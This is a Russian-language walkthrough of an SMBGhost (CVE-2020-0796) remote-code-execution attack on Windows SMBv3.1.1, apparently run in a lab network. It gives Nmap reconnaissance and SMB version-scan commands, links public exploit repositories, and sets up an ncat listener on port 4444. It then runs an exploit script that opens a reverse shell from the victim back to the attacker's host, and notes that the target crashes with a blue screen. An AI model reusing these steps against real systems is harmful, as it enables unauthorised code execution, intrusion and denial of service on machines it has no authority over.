
Эксплойт-доказательство концепции для CVE-2020-0796 (SMBGhost), нацеленный на Windows 10/Server SMBv3.1.1. Включает разведку с помощью Nmap, сканирование уязвимостей и доставку полезной нагрузки обратной оболочки.
*- Затронутые версии

Запуск Nmap для сканирования сети в зоне DMZ
nmap -sS 192.168.116.0/24
nmap: название программы для сканирования сети.
-sS: выбор метода сканирования TCP SYN. При таком сканировании Nmap отправляет SYN-пакет на целевой хост и наблюдает за ответом. Если целевой хост отвечает SYN-ACK-пакетом, Nmap узнает, что порт открыт. Если целевой хост отвечает RST-пакетом, это означает, что порт закрыт.
192.168.116.0/24: конкретный IP-адрес или диапазон IP-адресов для сканирования. В данном случае диапазон — 192.168.116.0/24, охватывающий все адреса с 192.168.116.1 по 192.168.116.254.

=> Наблюдается, что у жертвы с IP-адресом 192.168.116.145 открыт порт 445.
· Использование Nmap для сканирования уязвимости на машине жертвы
nmap -p445 --script smb-protocols 192.168.116.145
nmap: название программы для сканирования сети.
-p445: указание конкретного порта для сканирования, в данном случае порт 445. Порт 445 обычно используется для связи с службой SMB (Server Message Block) в системах Windows.
--script smb-protocols: выбор скрипта smb-protocols для выполнения сканирования. Этот скрипт помогает проверить и отобразить информацию о версиях протокола SMB, поддерживаемых на целевом хосте.
192.168.116.145: IP-адрес целевого хоста для сканирования. В данном случае IP-адрес установлен как 192.168.116.145.

Результат smb-protocols показывает, что машина жертвы может быть уязвима и существует возможность эксплуатации SMBv3.1.1.
Для большей уверенности продолжаем проверку возможности эксплуатации уязвимости CVE-2020-0796 с помощью запуска Python-скрипта.
[]: -https://github.com/ly4k/SMBGhost "эксплойт"

=> Результат Vulnerable -> обнаружена уязвимость CVE-2020-0796, которую можно эксплуатировать на машине жертвы.
Проведение атаки Reverse_shell
Запуск сессии с помощью Netcat для прослушивания соединения от жертвы
ncat -lvp 4444
Запуск скрипта эксплуатации CVE-2020-0796
[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "эксплойт"
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

=> РЕЗУЛЬТАТ: Атакующая машина получает возможность выполнять shell-код на машине жертвы.

После успешного подключения атакующий может эксплуатировать и выполнять произвольный код на машине жертвы с правами пользователя, работающего в сессии.
При завершении сессии машина жертвы выдает синий экран (BlueScreen) и автоматически перезагружается.

Выполнение эксплуатации может привести к повреждению целевой системы